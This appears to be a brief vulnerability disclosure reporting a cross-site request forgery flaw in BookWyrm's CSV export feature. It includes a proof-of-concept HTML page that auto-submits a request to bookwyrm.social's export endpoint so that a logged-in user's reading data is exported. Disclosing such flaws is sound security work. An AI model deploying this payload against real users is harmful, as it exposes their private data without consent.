Cross-Site Request Forgery (CSRF) in bookwyrm-social/bookwyrm
Jul 11th 2022
An attacker is able to download data from a user via the CSV Export function. The export will include all the books on your shelves, books you have reviewed, and books with reading activity.
Proof of Concept
<html> <body> <script>history.pushState('', '', '/')</script> <form action="https://bookwyrm.social/preferences/export/file"> <input type="submit" value="Submit request" /> </form> <script> document.forms.submit(); </script> </body> </html>
This vulnerability is capable of download user reading data.